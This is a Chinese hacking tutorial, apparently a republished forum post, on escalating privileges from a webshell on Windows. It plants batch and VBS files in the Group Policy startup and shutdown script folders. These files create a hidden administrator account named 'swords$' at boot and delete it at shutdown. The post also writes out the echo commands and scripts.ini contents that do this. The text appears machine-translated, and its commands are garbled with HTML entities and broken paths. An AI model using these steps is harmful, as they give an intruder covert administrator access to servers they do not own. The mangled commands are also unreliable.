提高管理員權限:啟動腳本方法。妳已經看到了《我不是我[F.S.T.]》中總結的提升管理員權限的8種方法。現在我們使用啟動腳本和批處理來提高獲取shell時的權限。方法九:啟動腳本方法!!第壹批泄露,大家要仔細看。我盡量不廢話,言簡意賅。註意:啟動腳本是壹個批處理文件,在邀請用戶登錄之前運行。其作用類似於Win9X和DOS中的自動執行批處理文件autoexec.bat。由於腳本是在windows登錄之前運行的,所以我們可以修改腳本內容來設置系統,比如啟動後門、添加管理員賬號、修改管理員賬號等。不管妳怎麽想。騙人的..本文先介紹通過webshell添加隱藏賬號(畢竟這是大家最關心的:),然後說明問題發生後的解決方法。如何添加賬戶?I .如果能直接寫文件,比如ocean。(1)首先,我們用ocean為新管理員寫了壹個批處理文件swords1.bat,如下:net用戶swords $ Content $ nbspEVI octal/add net本地組管理員劍$ Content $ nbsp/add將壹個名為swords$的隱藏帳戶和密碼eviloctal添加到該批處理文件中。將文件swords1.bat保存在“c:\ win nt \ system32 \ group policy \ machine \ scripts \ startup”下。(註意:c: \ winnt是系統目錄。如果系統盤不是c盤,請相應更改為系統目錄。如果您查看這臺計算機,您可能找不到文件夾組策略\計算機\腳本\啟動。您可以選擇工具/文件夾選項/查看/單擊來顯示所有文件和文件夾。如果用fso來顯示海洋中的所有文件,就不用多此壹舉了。(2)接下來寫壹個批處理文件swords2.bat刪除管理員,非常簡單,壹句話就可以完成,如下:網友swords $ Content $ nbsp/del該批處理文件刪除了壹個被管理員命名為swords$的隱藏帳戶,並將文件swords2.bat保存在“C:\ win nt \ system32 \ group policy \ machine \ scripts \ shut down”下。(3)寫壹個啟動/關機腳本配置文件scripts.ini(註意:scripts是默認的配置文件名,並且)如下:[startup]0 cmdline = swords 1 . bat 0 parameters =[shut down]0 cmdline = swords 2 . bat 0 parameters =將文件scripts.ini保存到GroupPolicy\Machine\Scripts下的C:\winnt\system32\中。2.如果有cmdshell,可以有echo的權限,所以可以添加:(1)echo,啟動swords1.vbs時使用的文件,echo on error resume next & gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Startup \ swords 1 . VBS echo net用戶劍$ Content $ nbspEVI octal/add & gt;& gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Startup \ swords 1 . VBS echo net local group administrator s swords $ Content $ nbsp;/add & gt;& gtc:\ win nt \ system32 \ group policy \ machine \ scripts \ startup \ swords 1 . VBS註意:第壹行必須是' & gt這樣,原始數據就可以刪除了。(2)echo,swords2.vbs關閉時使用的腳本文件,echo net用戶swords $ Content $ nbsp/del & gt;C:\ win nt \ system32 \ group policy \ Machine \ Scripts \ shut down \ swords 2 . VBS(3)編寫壹個啟動/關閉腳本配置文件Scripts . ini echo[Startup]> C:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Scripts . ini echo 0 cmdline = swords 1 . VBS & gt;& gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Scripts . ini echo 0 parameters = & gt;& gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Scripts . ini echo[shut down]& gt;& gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Scripts . ini echo 0 cmdline = swords 2 . VBS & gt;& gtc:\ win nt \ system32 \ group policy \ Machine \ Scripts \ Scripts . ini echo 0 parameters = & gt;& gtC:\ win nt \ system32 \ group policy \ machine \ scripts \ scripts.ini將scripts . ini文件保存到C:\ win nt \ system32 \ group policy \ machine \ scripts。最後,等待服務器重啟電腦或者強制其自行啟動(手段很多)。那妳就等著玩吧。註意:使用此方法時,服務器必須已經分配了計算機啟動腳本,否則此方法可能不會成功。3.如果妳是本地電腦或者已經連接了對方的3389,但是只有普通用戶權限怎麽辦?在啟動計算機啟動/關機腳本之前,必須對其進行分配。分配計算機啟動/關機腳本需要通過組策略MMC(管理控制臺)管理單元來完成:(1)啟動/運行/MMC,打開Microsoft控制臺(2)按ctrl+M打開添加/刪除管理單元窗口,然後單擊添加。(3)在“添加獨立管理單元”對話框中選擇“組策略”,點擊“添加”按鈕。(4)選擇默認的"本地計算機"組策略對象/完成/確定/確定關閉窗口。(5)在生成的“本地計算機”策略中打開計算機配置/Windows設置/腳本(啟動/關機)節點,雙擊“啟動”或“關機”項,設置計算機啟動或關機時使用的腳本,點擊瀏覽,添加要啟動的腳本文件,確認。(6)設置完成後,保存並退出組策略MMC管理單元。刷新組策略後,這些腳本將在計算機啟動和關機時生效。註意:也可以直接打開gpedit.msc,展開計算機配置/Windows設置/腳本(啟動/關機),然後添加啟動腳本。然後依次展開“電腦配置/管理模板/系統/登錄”,啟用“顯示啟動腳本運行狀態”。重啟後看壹眼,打開cmd,輸入net user swords$顯示詳細信息。嘎嘎,又多了壹個用戶。(
上一篇:承德鋼鐵集團有限公司公司介紹。下一篇:大中小企業規模劃分標準2022